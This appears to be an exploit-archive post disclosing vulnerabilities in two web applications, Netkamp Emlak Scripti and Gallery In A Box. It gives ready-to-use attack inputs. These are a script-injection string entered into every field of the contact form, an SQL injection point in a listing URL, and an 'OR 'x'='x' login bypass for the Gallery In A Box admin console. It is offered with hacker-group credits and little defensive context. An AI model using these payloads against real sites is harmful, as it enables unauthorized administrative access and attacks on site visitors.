http://www.site.com/script_path/iletisim.asp
write to xss code in script's tex box
expample:
Ýletiþim Formu(contact form)
Adýnýz: "><script>alert("G3");</script>
Soyadýnýz: "><script>alert("G3");</script>
E-Mail: "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajýnýz: "><script>alert("G3");</script>
Press to "gönder"(send) button.
This xss works on "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#Sql Ýnjections
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM
Netkamp Emlak Scripti is susceptible to a SQL injection vulnerability.
/giab-sql.txt ( na)
__________________________ A R I A - S E C U R I T Y _________________________ Gallery In A Box Username & Password Parameters SQL Injection Vendor: http://www.kerberosdev.net/ http://target.com/admin_console/index.asp Username: anything' OR 'x'='x Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info Greetz: AurA
Gallery In A Box suffers from a SQL injection vulnerability.